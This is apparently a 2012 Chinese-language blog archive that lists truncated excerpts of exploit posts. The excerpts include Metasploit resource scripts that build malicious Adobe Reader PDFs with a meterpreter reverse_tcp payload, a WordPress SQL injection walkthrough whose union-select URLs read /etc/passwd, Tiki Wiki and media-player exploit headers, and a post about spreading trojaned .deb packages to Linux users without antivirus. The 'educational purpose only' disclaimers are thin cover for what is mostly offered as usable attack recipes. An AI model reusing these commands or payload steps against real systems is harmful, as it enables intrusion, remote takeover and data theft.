月归档:July 2012

video-evil_deb

video upload to dropbox already u can replace to any *.deb , we mean the source *.deb . most importantly , many user of linux without Anti-virus

发表在 Uncategorized | Comments Off on video-evil_deb

Windows/fileformat/adobe_cooltype_sing

Vulnerability Reference CVE-2010-2883 OSVDB-67849 Attacker Info: OS:BT5, R2 Metasploit version: Framework: 4.4.0-dev.15637 Console  : 4.4.0-dev.15613 Victim Info: OS:WindowsXP SP3 Adobe Reader:9.0 en Step: 1. craft a malicious pdf file and spread it out. ==================Exploit.rc====================== use exploit/windows/fileformat/adobe_cooltype_sing set LHOST 192.168.100.230 set … 继续阅读

发表在 Uncategorized | Comments Off on Windows/fileformat/adobe_cooltype_sing

windows/fileformat/adobe_utilprint

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : bt5 r2 attack m : win xp Chinese sp3 =================rc======================== use windows/fileformat/adobe_utilprint set payload windows/meterpreter/reverse_tcp … 继续阅读

发表在 Uncategorized | Comments Off on windows/fileformat/adobe_utilprint

windows/fileformat/adobe_libtiff

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : bt5 r2 attack m : win xp Chinese sp3 ========================================= use windows/fileformat/adobe_libtiff set payload windows/meterpreter/reverse_tcp … 继续阅读

发表在 Uncategorized | Comments Off on windows/fileformat/adobe_libtiff

exploit/windows/fileformat/adobe_jbig2decode

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : bt5 r2 attack m : bt5 r2 ==================rc ======================= use exploit/windows/fileformat/adobe_jbig2decode set payload windows/meterpreter/reverse_tcp show … 继续阅读

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_jbig2decode

exploit/windows/fileformat/adobe_geticon

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : bt5 r2 attack m : bt5 r2 ===================rc ====================== use exploit/windows/fileformat/adobe_geticon set payload windows/meterpreter/reverse_tcp show … 继续阅读

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_geticon

exploit/windows/fileformat/adobe_collectemailinfo

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : bt5 r2 attack m : bt5 r2 ====================  rc ===================== use exploit/windows/fileformat/adobe_collectemailinfo set payload windows/meterpreter/reverse_tcp … 继续阅读

发表在 Uncategorized | Comments Off on exploit/windows/fileformat/adobe_collectemailinfo

WordPress < = 1.5.1.1 "add new admin" SQL Injection Exploit

video upload to dropbox already ///////////////////////////////////// ////////////////////////////////////// admin 4debb7 cd /pentest/web/wpscan/ ./wpscan.rb –url http://192.168.94.128/wordpress http://192.168.94.128/wordpress/index.php?cat=0 union select 1,2,3,4,5 http://192.168.94.128/wordpress/index.php?cat=0 union select 1,version(),3,4,5 http://192.168.94.128/wordpress/index.php?cat=0 union select 1,user(),3,4,5 http://192.168.94.128/wordpress/index.php?cat=0 union select 1,database(),3,4,5 http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5 root@bt:~# echo -n /etc/passwd | xxd … 继续阅读

发表在 Uncategorized | Comments Off on WordPress < = 1.5.1.1 "add new admin" SQL Injection Exploit

Tiki Wiki <= 8.3 unserialize() PHP Code Execution

C this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim 1: bt5 r2 v2 : metasploitable v2.0 v3: bt5 r1 attack m : bt5 r2 ========================================= … 继续阅读

发表在 Uncategorized | Comments Off on Tiki Wiki <= 8.3 unserialize() PHP Code Execution

Chasys Media Player 2.0 Buffer Overflow Exploit(SEH)

B this poc was written for educational purpose only. use it at your own risk. Author will be not responsible for any. ========================================= victim : win xp sp3 attack m : bt5 r2 ========================================= =================================== exp info v M back … 继续阅读

发表在 Uncategorized | Comments Off on Chasys Media Player 2.0 Buffer Overflow Exploit(SEH)